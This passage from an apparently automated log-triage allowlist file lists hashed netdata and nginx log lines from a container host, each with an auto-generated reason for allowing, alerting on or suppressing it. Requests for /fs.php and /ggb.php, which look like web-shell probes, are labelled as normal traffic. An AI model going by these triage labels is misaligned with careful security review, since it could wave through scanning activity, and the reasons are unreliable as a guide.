"a8add82faf1cfc55622a07c7f2ce94c23856f06992b1923ad36822528253ae16": { "type": "hash", "value": "a8add82faf1cfc55622a07c7f2ce94c23856f06992b1923ad36822528253ae16", "source": "auto", "reason": "Normal startup/diagnostic warning from tc-qos-helper.sh about FireQOS not being installed. Not indicative of malicious activity.", "original_line": "\u003cNUM\u003e-03-20 05:34:43: tc-qos-helper.sh: WARNING: FireQOS is not installed on this system. Use FireQOS to apply traffic QoS and expose the class names to netdata. Check https://github.com/netdata/netdata/tree/master/collectors/tc.plugin#tcplugin", "created_at": "2026-03-20T05:34:49.322672543Z" }, "ae098719d4256c5532029f4702cfd09a03f37fa6e1f563599b35e1284356736a": { "type": "hash", "value": "ae098719d4256c5532029f4702cfd09a03f37fa6e1f563599b35e1284356736a", "source": "auto", "reason": "A routine warning about a missing configuration file in a container. Not indicative of attack or misuse; likely a known benign issue in NetData tc-qos-helper.", "original_line": "\u003cNUM\u003e-03-20 00:34:33: tc-qos-helper.sh: WARNING: Cannot find file '/usr/lib/netdata/conf.d/tc-qos-helper.conf'.", "created_at": "2026-03-20T00:34:47.495721893Z" }, "b1bfcbfaf63a43175d0b9e5be7668a721cab3841487caf69efc231a67febe4ae": { "type": "hash", "value": "b1bfcbfaf63a43175d0b9e5be7668a721cab3841487caf69efc231a67febe4ae", "source": "auto", "reason": "Routine warning about missing configuration file; not indicative of attack or misbehavior.", "original_line": "\u003cNUM\u003e-03-20 10:34:53: tc-qos-helper.sh: WARNING: Cannot find file '/usr/lib/netdata/conf.d/tc-qos-helper.conf'.", "created_at": "2026-03-20T10:35:04.236154358Z" }, "b519c735f01aa8a909723ab30d94a614c380c12c9fa6842fdd44fefb75c21cf3": { "type": "hash", "value": "b519c735f01aa8a909723ab30d94a614c380c12c9fa6842fdd44fefb75c21cf3", "source": "auto", "reason": "Benign warning about a missing configuration file; not indicative of malicious activity and typical for containerized services undergoing startup/config checks.", "original_line": "\u003cNUM\u003e-03-20 02:34:37: tc-qos-helper.sh: WARNING: Cannot find file '/etc/netdata/tc-qos-helper.conf'.", "created_at": "2026-03-20T02:34:59.903218823Z" }, "b7b165821f358b325cd9ae167559ebffbb551a025a76be0fc7b676632f19ce55": { "type": "hash", "value": "b7b165821f358b325cd9ae167559ebffbb551a025a76be0fc7b676632f19ce55", "source": "auto", "reason": "Normal operational warning within a container about missing optional component (FireQOS). Not indicative of malicious activity.", "original_line": "\u003cNUM\u003e-03-20 06:34:45: tc-qos-helper.sh: WARNING: FireQOS is not installed on this system. Use FireQOS to apply traffic QoS and expose the class names to netdata. Check https://github.com/netdata/netdata/tree/master/collectors/tc.plugin#tcplugin", "created_at": "2026-03-20T06:34:51.540974674Z" }, "bb327ffd85604c8c92d978f7d0e1d29c2fbb822a0c75271c9b48fa4f9d4e98a1": { "type": "hash", "value": "bb327ffd85604c8c92d978f7d0e1d29c2fbb822a0c75271c9b48fa4f9d4e98a1", "source": "auto", "reason": "Routine maintenance log from netdata within a docker container; no anomalies detected.", "original_line": "\u003cNUM\u003e-03-20 05:59:36: netdata INFO : MAIN : Deleting data file \"/var/cache/netdata/dbengine/datafile-1-\u003cNUM\u003e.ndf\".", "created_at": "2026-03-20T05:59:43.872298109Z" }, "bfdb74b0864fb0534876f5908d7fb9c41690eca6abdf128b99239f83c1eb11a9": { "type": "hash", "value": "bfdb74b0864fb0534876f5908d7fb9c41690eca6abdf128b99239f83c1eb11a9", "source": "auto", "reason": "Remotely benign warning about missing FireQOS in a tc-qos helper script. Not indicative of abuse or intrusion.", "original_line": "\u003cNUM\u003e-03-20 14:35:01: tc-qos-helper.sh: WARNING: FireQOS is not installed on this system. Use FireQOS to apply traffic QoS and expose the class names to netdata. Check https://github.com/netdata/netdata/tree/master/collectors/tc.plugin#tcplugin", "created_at": "2026-03-20T14:35:14.10642038Z" }, "c1bad8847e37294be208d2c12b97f33cd28f42c198f691a19baa2716e88dfa2c": { "type": "hash", "value": "c1bad8847e37294be208d2c12b97f33cd28f42c198f691a19baa2716e88dfa2c", "source": "auto", "reason": " benign warning about a missing configuration file; not indicative of attack", "original_line": "\u003cNUM\u003e-03-20 08:34:49: tc-qos-helper.sh: WARNING: Cannot find file '/usr/lib/netdata/conf.d/tc-qos-helper.conf'.", "created_at": "2026-03-20T08:34:59.308469968Z" }, "c821840a783ef7e87fe23c59ce48b21f21f0797305398535f71cac198952d452": { "type": "hash", "value": "c821840a783ef7e87fe23c59ce48b21f21f0797305398535f71cac198952d452", "source": "auto", "reason": "Routine startup log from netdata indicating creation of data and journal files in a standard path.", "original_line": "\u003cNUM\u003e-03-20 11:06:48: netdata INFO : MAIN : Creating new data and journal files in path /var/cache/netdata/dbengine", "created_at": "2026-03-20T11:06:55.935106079Z" }, "c9e2d2cea67af1f1cc17f992d62e82bc1934059bc2487f418a8fd8229cd95d4b": { "type": "hash", "value": "c9e2d2cea67af1f1cc17f992d62e82bc1934059bc2487f418a8fd8229cd95d4b", "source": "auto", "reason": "Operational warning indicating FireQOS is not installed; not indicative of malicious activity.", "original_line": "\u003cNUM\u003e-03-20 08:34:49: tc-qos-helper.sh: WARNING: FireQOS is not installed on this system. Use FireQOS to apply traffic QoS and expose the class names to netdata. Check https://github.com/netdata/netdata/tree/master/collectors/tc.plugin#tcplugin", "created_at": "2026-03-20T08:34:54.3605748Z" }, "ca6146828435423d3852aa1c2e40cc680d6c8179f84de882ea89b8895feaa538": { "type": "hash", "value": "ca6146828435423d3852aa1c2e40cc680d6c8179f84de882ea89b8895feaa538", "source": "auto", "reason": "Normal maintenance log from netdata indicating deletion of a cached data file.", "original_line": "\u003cNUM\u003e-03-20 05:59:36: netdata INFO : MAIN : Deleted data file \"/var/cache/netdata/dbengine/datafile-1-\u003cNUM\u003e.ndf\".", "created_at": "2026-03-20T06:00:05.012844035Z" }, "cdc59c7b274b9be86b81dea0677be0c06a7bb39ee1d8288e0c137eba6d84a080": { "type": "hash", "value": "cdc59c7b274b9be86b81dea0677be0c06a7bb39ee1d8288e0c137eba6d84a080", "source": "auto", "reason": "A benign warning about a missing configuration file during container startup; common in service initializations.", "original_line": "\u003cNUM\u003e-03-20 01:34:35: tc-qos-helper.sh: WARNING: Cannot find file '/usr/lib/netdata/conf.d/tc-qos-helper.conf'.", "created_at": "2026-03-20T01:34:46.793077008Z" }, "ce50cc672a75ea83f9ca4809bb35066c73d170ba576fdfecccd94f98398f96fb": { "type": "hash", "value": "ce50cc672a75ea83f9ca4809bb35066c73d170ba576fdfecccd94f98398f96fb", "source": "auto", "reason": "Normal warning about a missing configuration file in a netdata-related script; not inherently malicious.", "original_line": "\u003cNUM\u003e-03-20 06:34:45: tc-qos-helper.sh: WARNING: Cannot find file '/usr/lib/netdata/conf.d/tc-qos-helper.conf'.", "created_at": "2026-03-20T06:34:58.895803896Z" }, "ceb617b648064f3ec062d3c74f16655e86d49f7f5ff5f0dc4525cdafbc1bd41d": { "type": "hash", "value": "ceb617b648064f3ec062d3c74f16655e86d49f7f5ff5f0dc4525cdafbc1bd41d", "source": "auto", "reason": "Informational maintenance log indicating deletion of a journal file. Normal operation for netdata.", "original_line": "\u003cNUM\u003e-03-20 05:59:36: netdata INFO : MAIN : Deleted journal file \"/var/cache/netdata/dbengine/journalfile-1-\u003cNUM\u003e.njf\".", "created_at": "2026-03-20T05:59:54.411051525Z" }, "d53e04780cdc5de44dd1f8e8437abb09329168aba4e2fca33cc422cade7a9d00": { "type": "hash", "value": "d53e04780cdc5de44dd1f8e8437abb09329168aba4e2fca33cc422cade7a9d00", "source": "auto", "reason": "A routine warning about a missing configuration file in a netdata container; not indicative of malicious activity.", "original_line": "\u003cNUM\u003e-03-20 05:34:43: tc-qos-helper.sh: WARNING: Cannot find file '/etc/netdata/tc-qos-helper.conf'.", "created_at": "2026-03-20T05:35:01.874059068Z" }, "d95b5dbb8569a3516717a78d5bbdb989e202f576597bac0de080943cc99e81b0": { "type": "hash", "value": "d95b5dbb8569a3516717a78d5bbdb989e202f576597bac0de080943cc99e81b0", "source": "auto", "reason": "A routine warning about a missing configuration file; common during startup or runtime in containerized monitoring tools. Not indicative of attack.", "original_line": "\u003cNUM\u003e-03-20 16:35:06: tc-qos-helper.sh: WARNING: Cannot find file '/usr/lib/netdata/conf.d/tc-qos-helper.conf'.", "created_at": "2026-03-20T16:35:26.491463487Z" }, "daaef7488aeca829bce867b58563d08e4a4c5a944db787a8428c7b3d15b9f30d": { "type": "hash", "value": "daaef7488aeca829bce867b58563d08e4a4c5a944db787a8428c7b3d15b9f30d", "source": "auto", "reason": "Normal informational log about disk space reclamation by netdata inside a container.", "original_line": "\u003cNUM\u003e-03-20 05:59:36: netdata INFO : MAIN : Reclaimed \u003cNUM\u003e bytes of disk space.", "created_at": "2026-03-20T06:00:11.28242451Z" }, "e85450926461c42cf96598525669f047f767f34891381545d2116d1503b64469": { "type": "hash", "value": "e85450926461c42cf96598525669f047f767f34891381545d2116d1503b64469", "source": "auto", "reason": "Normal warning about a missing configuration file; non-malicious and common in deployments with optional configs.", "original_line": "\u003cNUM\u003e-03-20 16:35:06: tc-qos-helper.sh: WARNING: Cannot find file '/etc/netdata/tc-qos-helper.conf'.", "created_at": "2026-03-20T16:35:38.166975546Z" }, "e9f9300c1d1082ac311cac3eff12c64d29bd467505f5ee24d5dd241e2090aa45": { "type": "hash", "value": "e9f9300c1d1082ac311cac3eff12c64d29bd467505f5ee24d5dd241e2090aa45", "source": "auto", "reason": "A benign warning about missing FireQOS in a container; no misuse detected.", "original_line": "\u003cNUM\u003e-03-20 01:34:35: tc-qos-helper.sh: WARNING: FireQOS is not installed on this system. Use FireQOS to apply traffic QoS and expose the class names to netdata. Check https://github.com/netdata/netdata/tree/master/collectors/tc.plugin#tcplugin", "created_at": "2026-03-20T01:34:41.185952427Z" }, "ede918031355cfb7cea9ece9cb98725bc29ac22ec86601c3b40a1a1966dc7f7a": { "type": "hash", "value": "ede918031355cfb7cea9ece9cb98725bc29ac22ec86601c3b40a1a1966dc7f7a", "source": "auto", "reason": "A routine warning about a missing configuration file; not obviously malicious or an intrusion attempt.", "original_line": "\u003cNUM\u003e-03-20 13:34:59: tc-qos-helper.sh: WARNING: Cannot find file '/etc/netdata/tc-qos-helper.conf'.", "created_at": "2026-03-20T13:35:17.693143841Z" }, "efd84c81767773a4f1c1ba309ac1609b3ac90e2302af50954c1a3371ff56dd6b": { "type": "hash", "value": "efd84c81767773a4f1c1ba309ac1609b3ac90e2302af50954c1a3371ff56dd6b", "source": "auto", "reason": "A non-critical warning about a missing configuration file in a scripted Netdata-related helper. This is common and not indicative of attack.", "original_line": "\u003cNUM\u003e-03-20 02:34:37: tc-qos-helper.sh: WARNING: Cannot find file '/usr/lib/netdata/conf.d/tc-qos-helper.conf'.", "created_at": "2026-03-20T02:34:54.976016682Z" }, "f5f6c1a2ff59935afeda4cdba610a10dd68c37d21e6dad1ec0e530a0956e6563": { "type": "hash", "value": "f5f6c1a2ff59935afeda4cdba610a10dd68c37d21e6dad1ec0e530a0956e6563", "source": "auto", "reason": "Benign warning about missing configuration file from a startup script; not indicative of an attack.", "original_line": "\u003cNUM\u003e-03-20 00:34:33: tc-qos-helper.sh: WARNING: Cannot find file '/etc/netdata/tc-qos-helper.conf'.", "created_at": "2026-03-20T00:34:53.292395496Z" } } }, "deny": {}, "alert": { "hashes": { "0f4a06b080bbbcc69320d1aa48b1ca5d0f007fb4176ca5e3e2c84a651d38beb7": { "type": "hash", "value": "0f4a06b080bbbcc69320d1aa48b1ca5d0f007fb4176ca5e3e2c84a651d38beb7", "source": "auto", "reason": "A warning about a missing configuration file can indicate misconfiguration or missing deployment assets. Not inherently malicious, but warrants attention.", "original_line": "\u003cNUM\u003e-03-20 10:34:53: tc-qos-helper.sh: WARNING: Cannot find file '/etc/netdata/tc-qos-helper.conf'.", "created_at": "2026-03-20T10:35:11.318634958Z" }, "35264e1da894ceb8391c1685aa7aa9fda2a0b7a259afd12ac7fd66c51d7bdfd0": { "type": "hash", "value": "35264e1da894ceb8391c1685aa7aa9fda2a0b7a259afd12ac7fd66c51d7bdfd0", "source": "auto", "reason": "A missing configuration file warning could indicate misconfiguration or incomplete setup, which is noteworthy but not confirmed as malicious.", "original_line": "\u003cNUM\u003e-03-20 07:34:47: tc-qos-helper.sh: WARNING: Cannot find file '/etc/netdata/tc-qos-helper.conf'.", "created_at": "2026-03-20T07:35:08.649975808Z" }, "4aeae852ad85f669f2c64a14036a4f81fe3cbbc124cdfe109f0b38e1044ecc97": { "type": "hash", "value": "4aeae852ad85f669f2c64a14036a4f81fe3cbbc124cdfe109f0b38e1044ecc97", "source": "auto", "reason": "Netdata tc-qos-helper cannot find its configuration file, a benign warning but may indicate misconfiguration or incomplete setup.", "original_line": "\u003cNUM\u003e-03-20 14:35:01: tc-qos-helper.sh: WARNING: Cannot find file '/usr/lib/netdata/conf.d/tc-qos-helper.conf'.", "created_at": "2026-03-20T14:35:25.187742102Z" }, "520d29d3edc1399fe54b82b53133259beeb157dcf9d34eb76bd50a7217f2b953": { "type": "hash", "value": "520d29d3edc1399fe54b82b53133259beeb157dcf9d34eb76bd50a7217f2b953", "source": "auto", "reason": "A missing configuration file warning from a netdata-related helper could indicate misconfiguration or missing mounts; not immediately malicious but warrants inspection.", "original_line": "\u003cNUM\u003e-03-20 09:34:51: tc-qos-helper.sh: WARNING: Cannot find file '/etc/netdata/tc-qos-helper.conf'.", "created_at": "2026-03-20T09:35:11.89700928Z" }, "58a0b8afc19512380aa01800a07792c1ea1b96352b41659e11e661fdb817b1cf": { "type": "hash", "value": "58a0b8afc19512380aa01800a07792c1ea1b96352b41659e11e661fdb817b1cf", "source": "auto", "reason": "Warning about missing configuration file can indicate misconfiguration or partial setup; not malicious but worth monitoring.", "original_line": "\u003cNUM\u003e-03-20 03:34:39: tc-qos-helper.sh: WARNING: Cannot find file '/etc/netdata/tc-qos-helper.conf'.", "created_at": "2026-03-20T03:34:54.329131571Z" }, "7285a107d51b07b10c0a710f6a0839aa8351c10234fb4f1971f8c8a9aa6b53b1": { "type": "hash", "value": "7285a107d51b07b10c0a710f6a0839aa8351c10234fb4f1971f8c8a9aa6b53b1", "source": "auto", "reason": "Missing configuration file warning; could indicate misconfiguration or drift but not necessarily malicious.", "original_line": "\u003cNUM\u003e-03-20 14:35:01: tc-qos-helper.sh: WARNING: Cannot find file '/etc/netdata/tc-qos-helper.conf'.", "created_at": "2026-03-20T14:35:31.507481253Z" }, "842dd19c3fb554f3c1ece0ee9035618533191e0f570c62a4a2498b93676d0dcf": { "type": "hash", "value": "842dd19c3fb554f3c1ece0ee9035618533191e0f570c62a4a2498b93676d0dcf", "source": "auto", "reason": "A WARNING about a missing configuration file can indicate misconfiguration or disabled features; not an attack but warrants monitoring.", "original_line": "\u003cNUM\u003e-03-20 06:34:45: tc-qos-helper.sh: WARNING: Cannot find file '/etc/netdata/tc-qos-helper.conf'.", "created_at": "2026-03-20T06:35:11.216803147Z" }, "ea5e2204c955779a7762a011f0b7cfefacefed3ac29bcd48b55d43640d2fab4e": { "type": "hash", "value": "ea5e2204c955779a7762a011f0b7cfefacefed3ac29bcd48b55d43640d2fab4e", "source": "auto", "reason": "A WARNING about a missing configuration file could indicate a misconfiguration or environment drift. Not inherently malicious but warrants monitoring.", "original_line": "\u003cNUM\u003e-03-20 09:34:51: tc-qos-helper.sh: WARNING: Cannot find file '/usr/lib/netdata/conf.d/tc-qos-helper.conf'.", "created_at": "2026-03-20T09:35:05.901243125Z" } } }, "suppress": { "hashes": { "597216b4e7e92875ec5d33630fb82a6f0c72df529681742dc8de1855d2457168": { "type": "hash", "value": "597216b4e7e92875ec5d33630fb82a6f0c72df529681742dc8de1855d2457168", "source": "auto", "reason": "Routine warning from netdata helper script about a missing optional config file; typically non-exploitable and expected in some container builds.", "original_line": "\u003cNUM\u003e-03-19 22:34:29: tc-qos-helper.sh: WARNING: Cannot find file '/usr/lib/netdata/conf.d/tc-qos-helper.conf'.", "created_at": "2026-03-19T22:34:31.783461401Z" }, "8fd22a303e9b0d6719a16d2784bf34e5c159ddbb390de9be69673d7c619d5513": { "type": "hash", "value": "8fd22a303e9b0d6719a16d2784bf34e5c159ddbb390de9be69673d7c619d5513", "source": "auto", "reason": "Netdata tc-qos helper warning about a missing optional configuration file; typically non-critical unless expected to exist.", "original_line": "\u003cNUM\u003e-03-19 22:34:29: tc-qos-helper.sh: WARNING: Cannot find file '/etc/netdata/tc-qos-helper.conf'.", "created_at": "2026-03-19T22:34:33.031661828Z" }, "ff46f26266aee8558ac63c4ae7b6fd85149efeef78443ba39e39170532bbc04d": { "type": "hash", "value": "ff46f26266aee8558ac63c4ae7b6fd85149efeef78443ba39e39170532bbc04d", "source": "auto", "reason": "Netdata tc-qos helper warns that FireQOS is missing; this is expected configuration-not-set output rather than an attack.", "original_line": "\u003cNUM\u003e-03-19 22:34:29: tc-qos-helper.sh: WARNING: FireQOS is not installed on this system. Use FireQOS to apply traffic QoS and expose the class names to netdata. Check https://github.com/netdata/netdata/tree/master/collectors/tc.plugin#tcplugin", "created_at": "2026-03-19T22:34:30.691082694Z" } } } }, "docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo": { "allow": { "hashes": { "0248d91627b64f98fc1a024d4b47149ddade945ba958c00d70adc1143f70489c": { "type": "hash", "value": "0248d91627b64f98fc1a024d4b47149ddade945ba958c00d70adc1143f70489c", "source": "auto", "reason": "Normal nginx error about missing favicon.ico; common benign log during normal traffic", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/favicon.ico\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /favicon.ico HTTP/1.1\", host: \"54.200.221.0\"", "created_at": "2026-03-20T07:02:47.642450019Z" }, "02b823e3577b778a355c06376240bbe59212a6abff51a066b9a3d1f475df4aea": { "type": "hash", "value": "02b823e3577b778a355c06376240bbe59212a6abff51a066b9a3d1f475df4aea", "source": "auto", "reason": "Standard nginx access log for a 404 on robots.txt from a bot. No evidence of abuse or unauthorized access.", "original_line": "\"test3.admin.kovicloud.com\" \"\u003cVAR\u003e\" 404 2401 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T14:10:16.722664441Z" }, "08d95fdba2c488c94ec0799e185bdae5050be836cd35c79fd776509be7973394": { "type": "hash", "value": "08d95fdba2c488c94ec0799e185bdae5050be836cd35c79fd776509be7973394", "source": "auto", "reason": "Standard nginx/docker access log entry for a GET request to robots.txt from a well-known user agent (OAI-SearchBot). No anomalies detected.", "original_line": "\"api.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 24 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T15:00:00.580845361Z" }, "0b3ea51f0f5c23443d4a228d30c713971c5cebf9a5a54222c81600e3963622cd": { "type": "hash", "value": "0b3ea51f0f5c23443d4a228d30c713971c5cebf9a5a54222c81600e3963622cd", "source": "auto", "reason": "Normal HTTP access log entry showing a GET request to /api/v2/theme/current with 200 status. No anomalies detected in this line.", "original_line": "\"captain.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 68 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T10:32:57.825529868Z" }, "125c8b9562b0e2b3d22216857d4d09c9c47a58e0fe44e896b4d601bf6da77771": { "type": "hash", "value": "125c8b9562b0e2b3d22216857d4d09c9c47a58e0fe44e896b4d601bf6da77771", "source": "auto", "reason": "Standard access log entry for a GET request returning 200 OK from a bot user agent; no anomalies detected", "original_line": "\"login.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 60326 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T15:46:58.588647043Z" }, "1573d6d15d42a051561583d1a4d985087a6809fbf630e9082efa563ae6fc68ad": { "type": "hash", "value": "1573d6d15d42a051561583d1a4d985087a6809fbf630e9082efa563ae6fc68ad", "source": "auto", "reason": "Normal HTTP access log showing a GET request to root with 200 status and standard user agent", "original_line": "\"login.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 1196 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T15:46:27.40980653Z" }, "1bddafaba0622f78b85c741a9d1f5075798ca156b0b8b39d36e3d18debab04ac": { "type": "hash", "value": "1bddafaba0622f78b85c741a9d1f5075798ca156b0b8b39d36e3d18debab04ac", "source": "auto", "reason": "An nginx error log indicating a missing file (likely a normal 404-like event) from a web request. Not inherently malicious; common during normal operation.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/fs.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /fs.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:01:53.937609262Z" }, "1be362645106dcc37558e60c12270e5369b4db8f6ba7dd57ad28ee21862f1bd1": { "type": "hash", "value": "1be362645106dcc37558e60c12270e5369b4db8f6ba7dd57ad28ee21862f1bd1", "source": "auto", "reason": "Normal nginx error log about missing file for a request; not indicative of attack by itself.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/ggb.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /ggb.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:00:35.651149297Z" }, "1d1e203cdb8a36c4fa3eb5abfcf45ac152949f9cae545a6d5cce4c87d04d27f8": { "type": "hash", "value": "1d1e203cdb8a36c4fa3eb5abfcf45ac152949f9cae545a6d5cce4c87d04d27f8", "source": "auto", "reason": "Standard Nginx/HTTP access log line with 200 response, normal GET request to an application API endpoint.", "original_line": "\"captain.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 13459 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-19T22:40:09.894485261Z" }, "1d84ee4a9c046d6a5aa12d7b639d346b1e4d56c6d149b9584bb5194325e0ca92": { "type": "hash", "value": "1d84ee4a9c046d6a5aa12d7b639d346b1e4d56c6d149b9584bb5194325e0ca92", "source": "auto", "reason": "Regular HTTP HEAD request returning 200; user-agent appears to be UptimeRobot performing uptime checks.", "original_line": "\"api.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 0 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-19T22:24:51.762896951Z" }, "228c5c519fdc069fd98587f3b4091e6073a082f18a6eac1c64dd4426b04dccff": { "type": "hash", "value": "228c5c519fdc069fd98587f3b4091e6073a082f18a6eac1c64dd4426b04dccff", "source": "auto", "reason": "Normal HTTP access log entry with a 400 response; no clear malicious indicators.", "original_line": "\"media.admin.kovicloud.com\" \"\u003cVAR\u003e\" 400 0 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T07:17:54.53669954Z" }, "25ce73964c2304e71fbb43f6b6eb5ba49cb1f8eae8402a81c3d09c49964c82fb": { "type": "hash", "value": "25ce73964c2304e71fbb43f6b6eb5ba49cb1f8eae8402a81c3d09c49964c82fb", "source": "auto", "reason": "Normal nginx warning about upstream buffering to a temporary file; not indicative of attack or misconfiguration requiring immediate action.", "original_line": "[warn] \u003cPID\u003e: *\u003cCONN\u003e an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/25/0000003250 while reading upstream, client: \u003cCLIENT\u003e, server: captain.admin.kovicloud.com, request: \"GET /static/js/main.ecef38b1.js HTTP/1.1\", upstream: \"http://10.0.1.2:3000/static/js/main.ecef38b1.js\", host: \"captain.admin.kovicloud.com\"", "created_at": "2026-03-20T13:12:31.535407061Z" }, "25cf6ea167c201c169e51e35ec81838d9c02f59354d434ce7d05b220059805d8": { "type": "hash", "value": "25cf6ea167c201c169e51e35ec81838d9c02f59354d434ce7d05b220059805d8", "source": "auto", "reason": "Normal HTTP access log entry with a GET request and 200 status; typical web asset fetch.", "original_line": "\"captain.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 369 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T15:16:17.124280317Z" }, "2b55797035dc389586c3eb07d1072dd7310a876fbe5b4111d16872234e8c4aba": { "type": "hash", "value": "2b55797035dc389586c3eb07d1072dd7310a876fbe5b4111d16872234e8c4aba", "source": "auto", "reason": "Appears to be a normal successful HTTP request logged by nginx (status 200) from an external client with standard headers/user-agent.", "original_line": "\"captain.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 13428 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-19T22:24:53.699142601Z" }, "308c216b76a2d9f5a7fb893cb50530a6dd2ef0238b88450d44cda66da5b00d4c": { "type": "hash", "value": "308c216b76a2d9f5a7fb893cb50530a6dd2ef0238b88450d44cda66da5b00d4c", "source": "auto", "reason": "Standard HTTP access from a client to a manifest.json resource returning 200 OK. No abnormal patterns observed.", "original_line": "\"captain.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 355 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T13:13:04.511817378Z" }, "311cb61ab61a5cd18af42c85c654c5eed52bf2d4ff62b00821abf617d5b3d604": { "type": "hash", "value": "311cb61ab61a5cd18af42c85c654c5eed52bf2d4ff62b00821abf617d5b3d604", "source": "auto", "reason": "Standard nginx access log line from a container, no anomalies detected.", "original_line": "\"54.200.221.0\" \"\u003cVAR\u003e\" 200 2401 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T01:22:25.06048305Z" }, "31a6bc17f03f00ea662873b7a09ddac043cc809658dfb0894c43622cd85123f2": { "type": "hash", "value": "31a6bc17f03f00ea662873b7a09ddac043cc809658dfb0894c43622cd85123f2", "source": "auto", "reason": "Regular HTTP GET for a static asset with 200 status; no anomalous activity detected.", "original_line": "\"captain.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 7584137 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T13:12:55.42759404Z" }, "3741929dceab38f5dd0317d177553df37053afef9a617bdbf4773dd3d05b0142": { "type": "hash", "value": "3741929dceab38f5dd0317d177553df37053afef9a617bdbf4773dd3d05b0142", "source": "auto", "reason": "Normal HTTP request/response log showing a POST to an API endpoint with a 422 response; this is a typical client-side validation error and not indicative of malicious activity.", "original_line": "\"api.admin.kovicloud.com\" \"\u003cVAR\u003e\" 422 159 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T05:48:57.535944767Z" }, "3c919b38946335f7e49eb85a94594e083d01b1a1dad36e4dc8a1618ad8499439": { "type": "hash", "value": "3c919b38946335f7e49eb85a94594e083d01b1a1dad36e4dc8a1618ad8499439", "source": "auto", "reason": "Regular static asset request to an nginx-hosted site with a successful 200 response; no anomalous indicators.", "original_line": "\"captain.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 1354 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T10:32:36.940068051Z" }, "3db0a09529bea72a1a21eea9698b54bae54492367d3e08222350e60946dc6674": { "type": "hash", "value": "3db0a09529bea72a1a21eea9698b54bae54492367d3e08222350e60946dc6674", "source": "auto", "reason": "Normal HTTP request to an API endpoint with 200 status from a server host inside a container. No suspicious indicators detected.", "original_line": "\"api.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 889 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T12:45:50.015100888Z" }, "3e7a0bb7b2edefeaf8b33132cb37b85255deb4bca66df2adec65a838a607736e": { "type": "hash", "value": "3e7a0bb7b2edefeaf8b33132cb37b85255deb4bca66df2adec65a838a607736e", "source": "auto", "reason": "Normal web access with a common user agent (GPTBot) requesting a static asset (CSS) and returning 200.", "original_line": "\"login.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 711 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T15:47:10.006621684Z" }, "43713a4e70ce4c29043e59c53d5b4f8e0c7882e214b7fbe3cc9ee40c40733c33": { "type": "hash", "value": "43713a4e70ce4c29043e59c53d5b4f8e0c7882e214b7fbe3cc9ee40c40733c33", "source": "auto", "reason": "Normal web server access log for a favicon request with typical fields (IP, timestamp, user agent, bytes). Not indicative of abuse.", "original_line": "\"captain.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 1150 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T10:32:53.687329071Z" }, "4aa4042b054bf3287256fbc85f7bcc953f9f6e82ad9ad8ad0affb403e2955268": { "type": "hash", "value": "4aa4042b054bf3287256fbc85f7bcc953f9f6e82ad9ad8ad0affb403e2955268", "source": "auto", "reason": "Normal static web access to a host with a 404 for robots.txt; indicative of bot scanning rather than attack", "original_line": "\"login.admin.kovicloud.com\" \"\u003cVAR\u003e\" 404 1137 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": 